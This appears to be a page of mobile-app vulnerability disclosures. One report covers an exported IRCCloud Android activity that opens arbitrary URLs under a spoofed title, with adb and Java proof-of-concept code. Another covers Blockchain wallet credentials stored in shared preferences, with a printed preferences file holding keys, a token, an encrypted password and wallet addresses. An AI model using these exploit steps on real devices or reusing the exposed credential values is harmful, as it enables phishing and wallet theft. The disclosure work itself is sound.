Mobile Apps

Refs

a bug which allow to open arbitrary URLs in com.irccloud.android.activity.SAMLAuthActivity

This activity is exported:

<activity android:name="com.irccloud.android.activity.SAMLAuthActivity" android:theme="@style/dawn" android:windowSoftInputMode="adjustResize">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
</intent-filter>
</activity>

it means that it can be accessed by any third-party apps installed on the same device. On the newest Androids it also could be exploited by Android Instant Apps directly from a web-browser.

In file can see that it opens attacker provided URLs

if (getIntent() == null || !getIntent().hasExtra("auth_url")) {
finish();
return;
}
getSupportActionBar().setTitle(getIntent().getStringExtra("title"));
this.mWebView.loadUrl(getIntent().getStringExtra("auth_url"));

PoC from ADB:

adb shell am start -n com.irccloud.android/com.irccloud.android.activity.SAMLAuthActivity -e title "ATTAAACK" -e auth_url "http://google.com/"

PoC in Java:

Intent intent = new Intent();
intent.setClassName("com.irccloud.android", "com.irccloud.android.activity.SAMLAuthActivity");
intent.putExtra("title", "ATTAAACK");
intent.putExtra("auth_url", "http://google.com/");
startActivity(intent);

Result:

It's dangerous because user doesn't see real URL. Attacker can open anything and specify any title (like "IRCCloud: Login Required"), and using that trick steal user credentials.

Jan 17th, 2019

Game: Cat Runner (Android)

Sep 14th, 2018

Company: blockchain.com

Summary

If the wallet's owner lost their device, their credential will be definitely exposed to the risk. The attackers can easily obtain their credentials such as password and other wallet's information.

Vulnerability details

The sensitive data stored in shared_prefs folder including pin_key, encrypted password and other information of user's wallet. The encrypted pass word is crack-able when the Stack Protection is not enable which will open up the opportunity for the attackers to reverse the code and find out what hash function is being used.

Proof of concept

  1. Installed Blockchain wallet app on Bluestack

  2. Logged on with an authenticated account

  3. Using adb to connect with the device via Terminal

  4. The user's credential stored in /data/data/piuk.blockchain.android/shared_prefs/piuk.blockchain.android_preferences.xml

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="logged_out" value="false" />
<string name="sharedKey">6cce3c75-6945-442e-827f-d47e0ee894e8</string>
<string name="guid">ccc64d34-142b-4673-905f-57e0ad52a2fb</string>
<string name="firebase_token">dFjqwI8-GPo:APA91bGPmOdbhELsOllxsfFTIlLwrHvKwjBsXYGat-8ZRxuSBA21qKdPzylJPBGK_2-P6B-eDx8bx_9hcnDl5cMQ77vnKlz34IpLAEJ86j-CuQb5LLdNGEgIjwnm0q8NbNpMorPqRv1w</string>
<boolean name="swipe_to_receive_enabled" value="true" />
<string name="KEY_CURRENCY_CRYPTO_STATE">BTC</string>
<boolean name="push_notification_enabled" value="true" />
<boolean name="push_notifications" value="true" />
<boolean name="screenshots_enabled" value="false" />
<int name="app_visits" value="3" />
<string name="LAST_KNOWN_BTC_VALUE_FOR_CURRENCY_EUR">5389.02</string>
<boolean name="newly_created_wallet" value="false" />
<string name="LAST_KNOWN_ETH_VALUE_FOR_CURRENCY_EUR">148.31</string>
<string name="swipe_receive_bch_addresses">1LE3zuwjD216DyE7GKFL22SQtmXdKYKs8R,1HcvXMu91nAsvSHzjAfqxhNxhK2pYFYbsY,14cG3xJ7c482ymwtDa2Qzn1WNDp7VrZSZs,1NKu3MhxtQ9jovYPR9iXyA8QUrPVFAPZ7T,1EutsGyW4v1fJreP6XbzqJ8vgMRHSdBkjy,</string>
<string name="LAST_KNOWN_ETH_VALUE_FOR_CURRENCY_USD">173.1</string>
<boolean name="fingerprint" value="false" />
<boolean name="2fa" value="false" />
<boolean name="email_notifications" value="false" />
<boolean name="code_verified" value="true" />
<string name="swipe_receive_bch_account_name">My Bitcoin Cash Wallet</string>
<boolean name="tor" value="false" />
<string name="pin_kookup_key">43948b874026629327952f69d49ea0bb</string>
<string name="swipe_receive_account_name">My Bitcoin Wallet</string>
<long name="security_time_elapsed" value="1536740039696" />
<string name="encrypted_password">26sMpt7MYTI0ItT6wqG+N1grvxgEo8EXJysoBg/nEeQ=</string>
<string name="LAST_KNOWN_BCH_VALUE_FOR_CURRENCY_USD">419.69</string>
<boolean name="receive_shortcuts_enabled" value="true" />
<string name="swipe_receive_addresses">1LE3zuwjD216DyE7GKFL22SQtmXdKYKs8R,1HcvXMu91nAsvSHzjAfqxhNxhK2pYFYbsY,14cG3xJ7c482ymwtDa2Qzn1WNDp7VrZSZs,1NKu3MhxtQ9jovYPR9iXyA8QUrPVFAPZ7T,1EutsGyW4v1fJreP6XbzqJ8vgMRHSdBkjy,</string>
<string name="LAST_KNOWN_BTC_VALUE_FOR_CURRENCY_USD">6257.9</string>
<boolean name="fingerprint_enabled" value="false" />
<int name="pin_fails" value="0" />
<string name="swipe_receive_eth_address">0x768fd021f8eb3327b58fe0bbd114fac392256eeb</string>
<string name="ccurrency">USD</string>
</map>

5.Obtain the encrypted user's password and pin_key 6.Stack Protection is not enabled ,so started reversing the code and look for what hash function is being used to encrypt the password For password: the encryption function resides in public final class DoubleEncryptionFactory

Impact

The attacker might be able to steal the password and later decrypt it.